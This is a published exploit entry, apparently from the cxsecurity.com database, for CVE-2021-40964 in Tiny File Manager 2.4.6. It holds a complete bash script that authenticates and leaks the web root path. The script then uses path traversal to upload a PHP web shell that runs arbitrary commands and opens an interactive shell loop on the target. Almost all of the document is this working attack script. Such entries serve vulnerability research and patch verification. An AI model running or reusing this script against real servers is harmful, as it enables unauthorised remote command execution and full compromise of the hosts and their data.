Tiny File Manager 2.4.6 Remote Code Execution (RCE)

2022.04.07
Risk: High
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Tiny File Manager 2.4.6 - Remote Code Execution (RCE) # Date: 14/03/2022 # Exploit Author: FEBIN MON SAJI # Software Link: https://github.com/prasathmani/tinyfilemanager # Version: Tiny File Manager <= 2.4.6 # Tested on: Ubuntu 20.04 # CVE : CVE-2021-40964 # Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/ #!/bin/bash check(){ which curl if [ $? = 0 ] then printf "[✔] Curl found! \n" else printf "[❌] Curl not found! \n" exit fi which jq if [ $? = 0 ] then printf "[✔] jq found! \n" else printf "[❌] jq not found! \n" exit fi } usage(){ printf " TIny File Manager Authenticated RCE Exploit. By FEBIN $0 <URL> <Admin Username> <Password> Example: $0 http://files.ubuntu.local/index.php admin \"admin@123\" " } log-in(){ URL=$1 admin=$2 pass=$3 cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1) if [ $cookie ] then printf "\n[+] Login Success! Cookie: $cookie \n" else printf "\n[-] Logn Failed! \n" fi URL=${URL} } find_webroot(){ webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/" ) if [ $webroot ] then printf "\n[*] Try to Leak Web root directory path \n\n" printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n" else printf "[-] Can't find WEBROOT! Using default /var/www/html \n" webroot="/var/www/html" fi } upload(){ #webroot="/var/www/tiny/" shell="shell$RANDOM.php" echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell curl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell" | grep "successful" } exploit(){ WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/") upload if [ $? = 0 ] then printf "[+] File Upload Successful! \n" else printf "[-] File Upload Unsuccessful! Exiting! \n" exit 1 fi printf "[+] Checking for the shell \n" curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null if [ $? = 0 ] then printf "[+] Shell found ${WEB_URL}/$shell \n" else printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n" exit 2 fi printf "[+] Getting shell access! \n\n" while true do printf "$> " read cmd curl ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}" done } if [ $1 ] && [ $2 ] && [ $3 ] then check log-in $1 $2 $3 find_webroot exploit else usage fi


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top